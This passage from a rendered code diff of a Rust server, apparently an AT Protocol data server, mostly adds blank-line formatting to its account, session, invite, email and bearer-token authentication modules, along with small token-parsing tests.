DeleteAccountInput { 244 pub did: String, 245 pub password: String, 246 pub token: String, 247 } 248 + 249 pub async fn delete_account( 250 State(state): State<AppState>, 251 Json(input): Json<DeleteAccountInput>,
+8
src/api/server/app_password.rs
··· 11 use serde::{Deserialize, Serialize}; 12 use serde_json::json; 13 use tracing::{error, warn}; 14 #[derive(Serialize)] 15 #[serde(rename_all = "camelCase")] 16 pub struct AppPassword { ··· 18 pub created_at: String, 19 pub privileged: bool, 20 } 21 #[derive(Serialize)] 22 pub struct ListAppPasswordsOutput { 23 pub passwords: Vec<AppPassword>, 24 } 25 pub async fn list_app_passwords( 26 State(state): State<AppState>, 27 BearerAuth(auth_user): BearerAuth, ··· 54 } 55 } 56 } 57 #[derive(Deserialize)] 58 pub struct CreateAppPasswordInput { 59 pub name: String, 60 pub privileged: Option<bool>, 61 } 62 #[derive(Serialize)] 63 #[serde(rename_all = "camelCase")] 64 pub struct CreateAppPasswordOutput { ··· 67 pub created_at: String, 68 pub privileged: bool, 69 } 70 pub async fn create_app_password( 71 State(state): State<AppState>, 72 headers: HeaderMap, ··· 146 } 147 } 148 } 149 #[derive(Deserialize)] 150 pub struct RevokeAppPasswordInput { 151 pub name: String, 152 } 153 pub async fn revoke_app_password( 154 State(state): State<AppState>, 155 BearerAuth(auth_user): BearerAuth,
··· 11 use serde::{Deserialize, Serialize}; 12 use serde_json::json; 13 use tracing::{error, warn}; 14 + 15 #[derive(Serialize)] 16 #[serde(rename_all = "camelCase")] 17 pub struct AppPassword { ··· 19 pub created_at: String, 20 pub privileged: bool, 21 } 22 + 23 #[derive(Serialize)] 24 pub struct ListAppPasswordsOutput { 25 pub passwords: Vec<AppPassword>, 26 } 27 + 28 pub async fn list_app_passwords( 29 State(state): State<AppState>, 30 BearerAuth(auth_user): BearerAuth, ··· 57 } 58 } 59 } 60 + 61 #[derive(Deserialize)] 62 pub struct CreateAppPasswordInput { 63 pub name: String, 64 pub privileged: Option<bool>, 65 } 66 + 67 #[derive(Serialize)] 68 #[serde(rename_all = "camelCase")] 69 pub struct CreateAppPasswordOutput { ··· 72 pub created_at: String, 73 pub privileged: bool, 74 } 75 + 76 pub async fn create_app_password( 77 State(state): State<AppState>, 78 headers: HeaderMap, ··· 152 } 153 } 154 } 155 + 156 #[derive(Deserialize)] 157 pub struct RevokeAppPasswordInput { 158 pub name: String, 159 } 160 + 161 pub async fn revoke_app_password( 162 State(state): State<AppState>, 163 BearerAuth(auth_user): BearerAuth,
+7
src/api/server/email.rs
··· 10 use serde::Deserialize; 11 use serde_json::json; 12 use tracing::{error, info, warn}; 13 fn generate_confirmation_code() -> String { 14 crate::util::generate_token_code() 15 } 16 #[derive(Deserialize)] 17 #[serde(rename_all = "camelCase")] 18 pub struct RequestEmailUpdateInput { 19 pub email: String, 20 } 21 pub async fn request_email_update( 22 State(state): State<AppState>, 23 headers: axum::http::HeaderMap, ··· 119 info!("Email update requested for user {}", user_id); 120 (StatusCode::OK, Json(json!({ "tokenRequired": true }))).into_response() 121 } 122 #[derive(Deserialize)] 123 #[serde(rename_all = "camelCase")] 124 pub struct ConfirmEmailInput { 125 pub email: String, 126 pub token: String, 127 } 128 pub async fn confirm_email( 129 State(state): State<AppState>, 130 headers: axum::http::HeaderMap, ··· 236 info!("Email updated for user {}", user_id); 237 (StatusCode::OK, Json(json!({}))).into_response() 238 } 239 #[derive(Deserialize)] 240 #[serde(rename_all = "camelCase")] 241 pub struct UpdateEmailInput { ··· 244 pub email_auth_factor: Option<bool>, 245 pub token: Option<String>, 246 } 247 pub async fn update_email( 248 State(state): State<AppState>, 249 headers: axum::http::HeaderMap,
··· 10 use serde::Deserialize; 11 use serde_json::json; 12 use tracing::{error, info, warn}; 13 + 14 fn generate_confirmation_code() -> String { 15 crate::util::generate_token_code() 16 } 17 + 18 #[derive(Deserialize)] 19 #[serde(rename_all = "camelCase")] 20 pub struct RequestEmailUpdateInput { 21 pub email: String, 22 } 23 + 24 pub async fn request_email_update( 25 State(state): State<AppState>, 26 headers: axum::http::HeaderMap, ··· 122 info!("Email update requested for user {}", user_id); 123 (StatusCode::OK, Json(json!({ "tokenRequired": true }))).into_response() 124 } 125 + 126 #[derive(Deserialize)] 127 #[serde(rename_all = "camelCase")] 128 pub struct ConfirmEmailInput { 129 pub email: String, 130 pub token: String, 131 } 132 + 133 pub async fn confirm_email( 134 State(state): State<AppState>, 135 headers: axum::http::HeaderMap, ··· 241 info!("Email updated for user {}", user_id); 242 (StatusCode::OK, Json(json!({}))).into_response() 243 } 244 + 245 #[derive(Deserialize)] 246 #[serde(rename_all = "camelCase")] 247 pub struct UpdateEmailInput { ··· 250 pub email_auth_factor: Option<bool>, 251 pub token: Option<String>, 252 } 253 + 254 pub async fn update_email( 255 State(state): State<AppState>, 256 headers: axum::http::HeaderMap,
+12
src/api/server/invite.rs
··· 10 use serde::{Deserialize, Serialize}; 11 use tracing::error; 12 use uuid::Uuid; 13 #[derive(Deserialize)] 14 #[serde(rename_all = "camelCase")] 15 pub struct CreateInviteCodeInput { 16 pub use_count: i32, 17 pub for_account: Option<String>, 18 } 19 #[derive(Serialize)] 20 pub struct CreateInviteCodeOutput { 21 pub code: String, 22 } 23 pub async fn create_invite_code( 24 State(state): State<AppState>, 25 BearerAuth(auth_user): BearerAuth, ··· 81 } 82 } 83 } 84 #[derive(Deserialize)] 85 #[serde(rename_all = "camelCase")] 86 pub struct CreateInviteCodesInput { ··· 88 pub use_count: i32, 89 pub for_accounts: Option<Vec<String>>, 90 } 91 #[derive(Serialize)] 92 pub struct CreateInviteCodesOutput { 93 pub codes: Vec<AccountCodes>, 94 } 95 #[derive(Serialize)] 96 pub struct AccountCodes { 97 pub account: String, 98 pub codes: Vec<String>, 99 } 100 pub async fn create_invite_codes( 101 State(state): State<AppState>, 102 BearerAuth(auth_user): BearerAuth, ··· 172 } 173 Json(CreateInviteCodesOutput { codes: result_codes }).into_response() 174 } 175 #[derive(Deserialize)] 176 #[serde(rename_all = "camelCase")] 177 pub struct GetAccountInviteCodesParams { 178 pub include_used: Option<bool>, 179 pub create_available: Option<bool>, 180 } 181 #[derive(Serialize)] 182 #[serde(rename_all = "camelCase")] 183 pub struct InviteCode { ··· 189 pub created_at: String, 190 pub uses: Vec<InviteCodeUse>, 191 } 192 #[derive(Serialize)] 193 #[serde(rename_all = "camelCase")] 194 pub struct InviteCodeUse { 195 pub used_by: String, 196 pub used_at: String, 197 } 198 #[derive(Serialize)] 199 pub struct GetAccountInviteCodesOutput { 200 pub codes: Vec<InviteCode>, 201 } 202 pub async fn get_account_invite_codes( 203 State(state): State<AppState>, 204 BearerAuth(auth_user): BearerAuth,
··· 10 use serde::{Deserialize, Serialize}; 11 use tracing::error; 12 use uuid::Uuid; 13 + 14 #[derive(Deserialize)] 15 #[serde(rename_all = "camelCase")] 16 pub struct CreateInviteCodeInput { 17 pub use_count: i32, 18 pub for_account: Option<String>, 19 } 20 + 21 #[derive(Serialize)] 22 pub struct CreateInviteCodeOutput { 23 pub code: String, 24 } 25 + 26 pub async fn create_invite_code( 27 State(state): State<AppState>, 28 BearerAuth(auth_user): BearerAuth, ··· 84 } 85 } 86 } 87 + 88 #[derive(Deserialize)] 89 #[serde(rename_all = "camelCase")] 90 pub struct CreateInviteCodesInput { ··· 92 pub use_count: i32, 93 pub for_accounts: Option<Vec<String>>, 94 } 95 + 96 #[derive(Serialize)] 97 pub struct CreateInviteCodesOutput { 98 pub codes: Vec<AccountCodes>, 99 } 100 + 101 #[derive(Serialize)] 102 pub struct AccountCodes { 103 pub account: String, 104 pub codes: Vec<String>, 105 } 106 + 107 pub async fn create_invite_codes( 108 State(state): State<AppState>, 109 BearerAuth(auth_user): BearerAuth, ··· 179 } 180 Json(CreateInviteCodesOutput { codes: result_codes }).into_response() 181 } 182 + 183 #[derive(Deserialize)] 184 #[serde(rename_all = "camelCase")] 185 pub struct GetAccountInviteCodesParams { 186 pub include_used: Option<bool>, 187 pub create_available: Option<bool>, 188 } 189 + 190 #[derive(Serialize)] 191 #[serde(rename_all = "camelCase")] 192 pub struct InviteCode { ··· 198 pub created_at: String, 199 pub uses: Vec<InviteCodeUse>, 200 } 201 + 202 #[derive(Serialize)] 203 #[serde(rename_all = "camelCase")] 204 pub struct InviteCodeUse { 205 pub used_by: String, 206 pub used_at: String, 207 } 208 + 209 #[derive(Serialize)] 210 pub struct GetAccountInviteCodesOutput { 211 pub codes: Vec<InviteCode>, 212 } 213 + 214 pub async fn get_account_invite_codes( 215 State(state): State<AppState>, 216 BearerAuth(auth_user): BearerAuth,
+1
src/api/server/mod.rs
··· 7 pub mod service_auth; 8 pub mod session; 9 pub mod signing_key; 10 pub use account_status::{ 11 activate_account, check_account_status, deactivate_account, delete_account, 12 request_account_delete,
··· 7 pub mod service_auth; 8 pub mod session; 9 pub mod signing_key; 10 + 11 pub use account_status::{ 12 activate_account, check_account_status, deactivate_account, delete_account, 13 request_account_delete,
+5
src/api/server/password.rs
··· 10 use serde::Deserialize; 11 use serde_json::json; 12 use tracing::{error, info, warn}; 13 fn generate_reset_code() -> String { 14 crate::util::generate_token_code() 15 } ··· 28 } 29 "unknown".to_string() 30 } 31 #[derive(Deserialize)] 32 pub struct RequestPasswordResetInput { 33 pub email: String, 34 } 35 pub async fn request_password_reset( 36 State(state): State<AppState>, 37 headers: HeaderMap, ··· 102 info!("Password reset requested for user {}", user_id); 103 (StatusCode::OK, Json(json!({}))).into_response() 104 } 105 #[derive(Deserialize)] 106 pub struct ResetPasswordInput { 107 pub token: String, 108 pub password: String, 109 } 110 pub async fn reset_password( 111 State(state): State<AppState>, 112 headers: HeaderMap,
··· 10 use serde::Deserialize; 11 use serde_json::json; 12 use tracing::{error, info, warn}; 13 + 14 fn generate_reset_code() -> String { 15 crate::util::generate_token_code() 16 } ··· 29 } 30 "unknown".to_string() 31 } 32 + 33 #[derive(Deserialize)] 34 pub struct RequestPasswordResetInput { 35 pub email: String, 36 } 37 + 38 pub async fn request_password_reset( 39 State(state): State<AppState>, 40 headers: HeaderMap, ··· 105 info!("Password reset requested for user {}", user_id); 106 (StatusCode::OK, Json(json!({}))).into_response() 107 } 108 + 109 #[derive(Deserialize)] 110 pub struct ResetPasswordInput { 111 pub token: String, 112 pub password: String, 113 } 114 + 115 pub async fn reset_password( 116 State(state): State<AppState>, 117 headers: HeaderMap,
+3
src/api/server/service_auth.rs
··· 9 use serde::{Deserialize, Serialize}; 10 use serde_json::json; 11 use tracing::error; 12 #[derive(Deserialize)] 13 pub struct GetServiceAuthParams { 14 pub aud: String, 15 pub lxm: Option<String>, 16 pub exp: Option<i64>, 17 } 18 #[derive(Serialize)] 19 pub struct GetServiceAuthOutput { 20 pub token: String, 21 } 22 pub async fn get_service_auth( 23 State(state): State<AppState>, 24 headers: axum::http::HeaderMap,
··· 9 use serde::{Deserialize, Serialize}; 10 use serde_json::json; 11 use tracing::error; 12 + 13 #[derive(Deserialize)] 14 pub struct GetServiceAuthParams { 15 pub aud: String, 16 pub lxm: Option<String>, 17 pub exp: Option<i64>, 18 } 19 + 20 #[derive(Serialize)] 21 pub struct GetServiceAuthOutput { 22 pub token: String, 23 } 24 + 25 pub async fn get_service_auth( 26 State(state): State<AppState>, 27 headers: axum::http::HeaderMap,
+12
src/api/server/session.rs
··· 12 use serde::{Deserialize, Serialize}; 13 use serde_json::json; 14 use tracing::{error, info, warn}; 15 fn extract_client_ip(headers: &HeaderMap) -> String { 16 if let Some(forwarded) = headers.get("x-forwarded-for") { 17 if let Ok(value) = forwarded.to_str() { ··· 27 } 28 "unknown".to_string() 29 } 30 #[derive(Deserialize)] 31 pub struct CreateSessionInput { 32 pub identifier: String, 33 pub password: String, 34 } 35 #[derive(Serialize)] 36 #[serde(rename_all = "camelCase")] 37 pub struct CreateSessionOutput { ··· 40 pub handle: String, 41 pub did: String, 42 } 43 pub async fn create_session( 44 State(state): State<AppState>, 45 headers: HeaderMap, ··· 155 did: row.did, 156 }).into_response() 157 } 158 pub async fn get_session( 159 State(state): State<AppState>, 160 BearerAuth(auth_user): BearerAuth, ··· 194 } 195 } 196 } 197 pub async fn delete_session( 198 State(state): State<AppState>, 199 headers: axum::http::HeaderMap, ··· 227 } 228 } 229 } 230 pub async fn refresh_session( 231 State(state): State<AppState>, 232 headers: axum::http::HeaderMap, ··· 395 } 396 } 397 } 398 #[derive(Deserialize)] 399 #[serde(rename_all = "camelCase")] 400 pub struct ConfirmSignupInput { 401 pub did: String, 402 pub verification_code: String, 403 } 404 #[derive(Serialize)] 405 #[serde(rename_all = "camelCase")] 406 pub struct ConfirmSignupOutput { ··· 413 pub preferred_channel: String, 414 pub preferred_channel_verified: bool, 415 } 416 pub async fn confirm_signup( 417 State(state): State<AppState>, 418 Json(input): Json<ConfirmSignupInput>, ··· 535 preferred_channel_verified: true, 536 }).into_response() 537 } 538 #[derive(Deserialize)] 539 #[serde(rename_all = "camelCase")] 540 pub struct ResendVerificationInput { 541 pub did: String, 542 } 543 pub async fn resend_verification( 544 State(state): State<AppState>, 545 Json(input): Json<ResendVerificationInput>,
··· 12 use serde::{Deserialize, Serialize}; 13 use serde_json::json; 14 use tracing::{error, info, warn}; 15 + 16 fn extract_client_ip(headers: &HeaderMap) -> String { 17 if let Some(forwarded) = headers.get("x-forwarded-for") { 18 if let Ok(value) = forwarded.to_str() { ··· 28 } 29 "unknown".to_string() 30 } 31 + 32 #[derive(Deserialize)] 33 pub struct CreateSessionInput { 34 pub identifier: String, 35 pub password: String, 36 } 37 + 38 #[derive(Serialize)] 39 #[serde(rename_all = "camelCase")] 40 pub struct CreateSessionOutput { ··· 43 pub handle: String, 44 pub did: String, 45 } 46 + 47 pub async fn create_session( 48 State(state): State<AppState>, 49 headers: HeaderMap, ··· 159 did: row.did, 160 }).into_response() 161 } 162 + 163 pub async fn get_session( 164 State(state): State<AppState>, 165 BearerAuth(auth_user): BearerAuth, ··· 199 } 200 } 201 } 202 + 203 pub async fn delete_session( 204 State(state): State<AppState>, 205 headers: axum::http::HeaderMap, ··· 233 } 234 } 235 } 236 + 237 pub async fn refresh_session( 238 State(state): State<AppState>, 239 headers: axum::http::HeaderMap, ··· 402 } 403 } 404 } 405 + 406 #[derive(Deserialize)] 407 #[serde(rename_all = "camelCase")] 408 pub struct ConfirmSignupInput { 409 pub did: String, 410 pub verification_code: String, 411 } 412 + 413 #[derive(Serialize)] 414 #[serde(rename_all = "camelCase")] 415 pub struct ConfirmSignupOutput { ··· 422 pub preferred_channel: String, 423 pub preferred_channel_verified: bool, 424 } 425 + 426 pub async fn confirm_signup( 427 State(state): State<AppState>, 428 Json(input): Json<ConfirmSignupInput>, ··· 545 preferred_channel_verified: true, 546 }).into_response() 547 } 548 + 549 #[derive(Deserialize)] 550 #[serde(rename_all = "camelCase")] 551 pub struct ResendVerificationInput { 552 pub did: String, 553 } 554 + 555 pub async fn resend_verification( 556 State(state): State<AppState>, 557 Json(input): Json<ResendVerificationInput>,
+5
src/api/server/signing_key.rs
··· 10 use serde::{Deserialize, Serialize}; 11 use serde_json::json; 12 use tracing::{error, info}; 13 const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01]; 14 fn public_key_to_did_key(signing_key: &SigningKey) -> String { 15 let verifying_key = signing_key.verifying_key(); 16 let compressed_pubkey = verifying_key.to_sec1_bytes(); ··· 20 let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key); 21 format!("did:key:{}", encoded) 22 } 23 #[derive(Deserialize)] 24 pub struct ReserveSigningKeyInput { 25 pub did: Option<String>, 26 } 27 #[derive(Serialize)] 28 #[serde(rename_all = "camelCase")] 29 pub struct ReserveSigningKeyOutput { 30 pub signing_key: String, 31 } 32 pub async fn reserve_signing_key( 33 State(state): State<AppState>, 34 Json(input): Json<ReserveSigningKeyInput>,
··· 10 use serde::{Deserialize, Serialize}; 11 use serde_json::json; 12 use tracing::{error, info}; 13 + 14 const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01]; 15 + 16 fn public_key_to_did_key(signing_key: &SigningKey) -> String { 17 let verifying_key = signing_key.verifying_key(); 18 let compressed_pubkey = verifying_key.to_sec1_bytes(); ··· 22 let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key); 23 format!("did:key:{}", encoded) 24 } 25 + 26 #[derive(Deserialize)] 27 pub struct ReserveSigningKeyInput { 28 pub did: Option<String>, 29 } 30 + 31 #[derive(Serialize)] 32 #[serde(rename_all = "camelCase")] 33 pub struct ReserveSigningKeyOutput { 34 pub signing_key: String, 35 } 36 + 37 pub async fn reserve_signing_key( 38 State(state): State<AppState>, 39 Json(input): Json<ReserveSigningKeyInput>,
+2
src/api/temp.rs
··· 8 use serde_json::json; 9 use crate::auth::{extract_bearer_token_from_header, validate_bearer_token}; 10 use crate::state::AppState; 11 #[derive(Serialize)] 12 #[serde(rename_all = "camelCase")] 13 pub struct CheckSignupQueueOutput { ··· 17 #[serde(skip_serializing_if = "Option::is_none")] 18 pub estimated_time_ms: Option<i64>, 19 } 20 pub async fn check_signup_queue( 21 State(state): State<AppState>, 22 headers: HeaderMap,
··· 8 use serde_json::json; 9 use crate::auth::{extract_bearer_token_from_header, validate_bearer_token}; 10 use crate::state::AppState; 11 + 12 #[derive(Serialize)] 13 #[serde(rename_all = "camelCase")] 14 pub struct CheckSignupQueueOutput { ··· 18 #[serde(skip_serializing_if = "Option::is_none")] 19 pub estimated_time_ms: Option<i64>, 20 } 21 + 22 pub async fn check_signup_queue( 23 State(state): State<AppState>, 24 headers: HeaderMap,
+2
src/api/validation.rs
··· 3 pub const MAX_DOMAIN_LENGTH: usize = 253; 4 pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63; 5 const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-"; 6 pub fn is_valid_email(email: &str) -> bool { 7 let email = email.trim(); 8 if email.is_empty() || email.len() > MAX_EMAIL_LENGTH { ··· 49 } 50 true 51 } 52 #[cfg(test)] 53 mod tests { 54 use super::*;
··· 3 pub const MAX_DOMAIN_LENGTH: usize = 253; 4 pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63; 5 const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-"; 6 + 7 pub fn is_valid_email(email: &str) -> bool { 8 let email = email.trim(); 9 if email.is_empty() || email.len() > MAX_EMAIL_LENGTH { ··· 50 } 51 true 52 } 53 + 54 #[cfg(test)] 55 mod tests { 56 use super::*;
+27
src/auth/extractor.rs
··· 5 Json, 6 }; 7 use serde_json::json; 8 use crate::state::AppState; 9 use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated}; 10 pub struct BearerAuth(pub AuthenticatedUser); 11 #[derive(Debug)] 12 pub enum AuthError { 13 MissingToken, ··· 16 AccountDeactivated, 17 AccountTakedown, 18 } 19 impl IntoResponse for AuthError { 20 fn into_response(self) -> Response { 21 let (status, error, message) = match self { ··· 45 "Account has been taken down", 46 ), 47 }; 48 (status, Json(json!({ "error": error, "message": message }))).into_response() 49 } 50 } 51 fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> { 52 let auth_header = auth_header.trim(); 53 if auth_header.len() < 8 { 54 return Err(AuthError::InvalidFormat); 55 } 56 let prefix = &auth_header[..7]; 57 if !prefix.eq_ignore_ascii_case("bearer ") { 58 return Err(AuthError::InvalidFormat); 59 } 60 let token = auth_header[7..].trim(); 61 if token.is_empty() { 62 return Err(AuthError::InvalidFormat); 63 } 64 Ok(token) 65 } 66 pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> { 67 let header = auth_header?; 68 let header = header.trim(); 69 if header.len() < 7 { 70 return None; 71 } 72 if !header[..7].eq_ignore_ascii_case("bearer ") { 73 return None; 74 } 75 let token = header[7..].trim(); 76 if token.is_empty() { 77 return None; 78 } 79 Some(token.to_string()) 80 } 81 impl FromRequestParts<AppState> for BearerAuth { 82 type Rejection = AuthError; 83 async fn from_request_parts( 84 parts: &mut Parts, 85 state: &AppState, ··· 90 .ok_or(AuthError::MissingToken)? 91 .to_str() 92 .map_err(|_| AuthError::InvalidFormat)?; 93 let token = extract_bearer_token(auth_header)?; 94 match validate_bearer_token_cached(&state.db, &state.cache, token).await { 95 Ok(user) => Ok(BearerAuth(user)), 96 Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), ··· 99 } 100 } 101 } 102 pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser); 103 impl FromRequestParts<AppState> for BearerAuthAllowDeactivated { 104 type Rejection = AuthError; 105 async fn from_request_parts( 106 parts: &mut Parts, 107 state: &AppState, ··· 112 .ok_or(AuthError::MissingToken)? 113 .to_str() 114 .map_err(|_| AuthError::InvalidFormat)?; 115 let token = extract_bearer_token(auth_header)?; 116 match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await { 117 Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 118 Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), ··· 120 } 121 } 122 } 123 #[cfg(test)] 124 mod tests { 125 use super::*; 126 #[test] 127 fn test_extract_bearer_token() { 128 assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123"); ··· 130 assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123"); 131 assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123"); 132 assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123"); 133 assert!(extract_bearer_token("Basic abc123").is_err()); 134 assert!(extract_bearer_token("Bearer").is_err()); 135 assert!(extract_bearer_token("Bearer ").is_err());
··· 5 Json, 6 }; 7 use serde_json::json; 8 + 9 use crate::state::AppState; 10 use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated}; 11 + 12 pub struct BearerAuth(pub AuthenticatedUser); 13 + 14 #[derive(Debug)] 15 pub enum AuthError { 16 MissingToken, ··· 19 AccountDeactivated, 20 AccountTakedown, 21 } 22 + 23 impl IntoResponse for AuthError { 24 fn into_response(self) -> Response { 25 let (status, error, message) = match self { ··· 49 "Account has been taken down", 50 ), 51 }; 52 + 53 (status, Json(json!({ "error": error, "message": message }))).into_response() 54 } 55 } 56 + 57 fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> { 58 let auth_header = auth_header.trim(); 59 + 60 if auth_header.len() < 8 { 61 return Err(AuthError::InvalidFormat); 62 } 63 + 64 let prefix = &auth_header[..7]; 65 if !prefix.eq_ignore_ascii_case("bearer ") { 66 return Err(AuthError::InvalidFormat); 67 } 68 + 69 let token = auth_header[7..].trim(); 70 if token.is_empty() { 71 return Err(AuthError::InvalidFormat); 72 } 73 + 74 Ok(token) 75 } 76 + 77 pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> { 78 let header = auth_header?; 79 let header = header.trim(); 80 + 81 if header.len() < 7 { 82 return None; 83 } 84 + 85 if !header[..7].eq_ignore_ascii_case("bearer ") { 86 return None; 87 } 88 + 89 let token = header[7..].trim(); 90 if token.is_empty() { 91 return None; 92 } 93 + 94 Some(token.to_string()) 95 } 96 + 97 impl FromRequestParts<AppState> for BearerAuth { 98 type Rejection = AuthError; 99 + 100 async fn from_request_parts( 101 parts: &mut Parts, 102 state: &AppState, ··· 107 .ok_or(AuthError::MissingToken)? 108 .to_str() 109 .map_err(|_| AuthError::InvalidFormat)?; 110 + 111 let token = extract_bearer_token(auth_header)?; 112 + 113 match validate_bearer_token_cached(&state.db, &state.cache, token).await { 114 Ok(user) => Ok(BearerAuth(user)), 115 Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), ··· 118 } 119 } 120 } 121 + 122 pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser); 123 + 124 impl FromRequestParts<AppState> for BearerAuthAllowDeactivated { 125 type Rejection = AuthError; 126 + 127 async fn from_request_parts( 128 parts: &mut Parts, 129 state: &AppState, ··· 134 .ok_or(AuthError::MissingToken)? 135 .to_str() 136 .map_err(|_| AuthError::InvalidFormat)?; 137 + 138 let token = extract_bearer_token(auth_header)?; 139 + 140 match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await { 141 Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 142 Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), ··· 144 } 145 } 146 } 147 + 148 #[cfg(test)] 149 mod tests { 150 use super::*; 151 + 152 #[test] 153 fn test_extract_bearer_token() { 154 assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123"); ··· 156 assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123"); 157 assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123"); 158 assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123"); 159 + 160 assert!(extract_bearer_token("Basic abc123").is_err()); 161 assert!(extract_bearer_token("Bearer").is_err()); 162 assert!(extract_bearer_token("Bearer ").is_err());
+35 -1
src/auth/mod.rs
··· 3 use std::fmt; 4 use std::sync::Arc; 5 use std::time::Duration; 6 use crate::cache::Cache; 7 pub mod extractor; 8 pub mod token; 9 pub mod verify; 10 pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header}; 11 pub use token::{ 12 create_access_token, create_refresh_token, create_service_token, ··· 16 SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, 17 }; 18 pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token}; 19 const KEY_CACHE_TTL_SECS: u64 = 300; 20 const SESSION_CACHE_TTL_SECS: u64 = 60; 21 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 22 pub enum TokenValidationError { 23 AccountDeactivated, ··· 25 KeyDecryptionFailed, 26 AuthenticationFailed, 27 } 28 impl fmt::Display for TokenValidationError { 29 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { 30 match self { ··· 35 } 36 } 37 } 38 pub struct AuthenticatedUser { 39 pub did: String, 40 pub key_bytes: Option<Vec<u8>>, 41 pub is_oauth: bool, 42 } 43 pub async fn validate_bearer_token( 44 db: &PgPool, 45 token: &str, 46 ) -> Result<AuthenticatedUser, TokenValidationError> { 47 validate_bearer_token_with_options_internal(db, None, token, false).await 48 } 49 pub async fn validate_bearer_token_allow_deactivated( 50 db: &PgPool, 51 token: &str, 52 ) -> Result<AuthenticatedUser, TokenValidationError> { 53 validate_bearer_token_with_options_internal(db, None, token, true).await 54 } 55 pub async fn validate_bearer_token_cached( 56 db: &PgPool, 57 cache: &Arc<dyn Cache>, ··· 59 ) -> Result<AuthenticatedUser, TokenValidationError> { 60 validate_bearer_token_with_options_internal(db, Some(cache), token, false).await 61 } 62 pub async fn validate_bearer_token_cached_allow_deactivated( 63 db: &PgPool, 64 cache: &Arc<dyn Cache>, ··· 66 ) -> Result<AuthenticatedUser, TokenValidationError> { 67 validate_bearer_token_with_options_internal(db, Some(cache), token, true).await 68 } 69 async fn validate_bearer_token_with_options_internal( 70 db: &PgPool, 71 cache: Option<&Arc<dyn Cache>>, ··· 73 allow_deactivated: bool, 74 ) -> Result<AuthenticatedUser, TokenValidationError> { 75 let did_from_token = get_did_from_token(token).ok(); 76 if let Some(ref did) = did_from_token { 77 let key_cache_key = format!("auth:key:{}", did); 78 let mut cached_key: Option<Vec<u8>> = None; 79 if let Some(c) = cache { 80 cached_key = c.get_bytes(&key_cache_key).await; 81 if cached_key.is_some() { ··· 84 crate::metrics::record_auth_cache_miss("key"); 85 } 86 } 87 let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key { 88 let user_status = sqlx::query!( 89 "SELECT deactivated_at, takedown_ref FROM users WHERE did = $1", ··· 93 .await 94 .ok() 95 .flatten(); 96 match user_status { 97 Some(status) => (Some(key), status.deactivated_at, status.takedown_ref), 98 None => (None, None, None), ··· 112 { 113 let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version) 114 .map_err(|_| TokenValidationError::KeyDecryptionFailed)?; 115 if let Some(c) = cache { 116 let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await; 117 } 118 (Some(key), user.deactivated_at, user.takedown_ref) 119 } else { 120 (None, None, None) 121 } 122 }; 123 if let Some(decrypted_key) = decrypted_key { 124 if !allow_deactivated && deactivated_at.is_some() { 125 return Err(TokenValidationError::AccountDeactivated); 126 } 127 if takedown_ref.is_some() { 128 return Err(TokenValidationError::AccountTakedown); 129 } 130 if let Ok(token_data) = verify_access_token(token, &decrypted_key) { 131 let jti = &token_data.claims.jti; 132 let session_cache_key = format!("auth:session:{}:{}", did, jti); 133 let mut session_valid = false; 134 if let Some(c) = cache { 135 if let Some(cached_value) = c.get(&session_cache_key).await { 136 session_valid = cached_value == "1"; ··· 139 crate::metrics::record_auth_cache_miss("session"); 140 } 141 } 142 if !session_valid { 143 let session_exists = sqlx::query_scalar!( 144 "SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()", ··· 149 .await 150 .ok() 151 .flatten(); 152 session_valid = session_exists.is_some(); 153 if session_valid { 154 if let Some(c) = cache { 155 let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await; 156 } 157 } 158 } 159 if session_valid { 160 return Ok(AuthenticatedUser { 161 did: did.clone(), ··· 166 } 167 } 168 } 169 if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) { 170 if let Some(oauth_token) = sqlx::query!( 171 r#"SELECT t.did, t.expires_at, 